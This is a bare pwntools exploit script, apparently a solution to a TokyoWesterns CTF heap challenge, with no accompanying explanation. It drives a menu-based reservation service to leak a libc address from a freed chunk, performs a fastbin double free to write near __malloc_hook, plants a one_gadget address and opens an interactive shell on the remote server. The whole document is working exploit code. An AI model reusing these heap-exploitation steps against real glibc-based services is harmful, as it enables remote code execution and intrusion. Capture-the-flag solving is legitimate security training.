from pwn import *

#s = remote('192.168.0.85',1234)
s = remote('pwn1.chal.ctf.westerns.tokyo', 31729)
def reserve(li,size,dat=""):
	s.recvuntil('>>')
	s.sendline('1')
	s.recvuntil('>>')
	s.sendline(str(li[0]))
	s.recvuntil('>>')
	s.sendline(str(li[1]))
	s.recvuntil('>>')
	s.sendline(str(li[2]))
	s.recvuntil('>>')
	s.sendline(str(li[3]))
	s.recvuntil('>>')
	s.sendline(str(size))
	if not dat == "":
		s.recvuntil('>>')
		s.send(dat)
def cancel(index):
	s.recvuntil('>>')
	s.sendline('3')
	s.recvuntil('>>')
	s.sendline(str(index))
raw_input()
s.recvuntil('name :')
s.sendline('1234')
li = [34,34,12,12]
reserve(li,0xff,"A\n")
reserve(li,0xff,"A\n")
cancel(1)
reserve(li,1234)
s.recvuntil('>>')
s.sendline('2')
libc = u64(s.recvuntil('\x7f')[-6:]+'\x00\x00') - 0x3c4b78
log.info("LIBC : 0x%x"%libc)
reserve(li,0x68,"A\n")
reserve(li,0x68,"A\n")
cancel(3)
reserve(li,1234)
cancel(4)
cancel(3)
reserve(li,0x68,p64(libc+0x3c4aed)+'\n')
reserve(li,0x68,"A"*8+'\n')
reserve(li,0x68,"\x00"*8+'\n')
reserve(li,0x68,"A"*0x13+p64(libc+0xf0274)+'\n')
s.interactive()
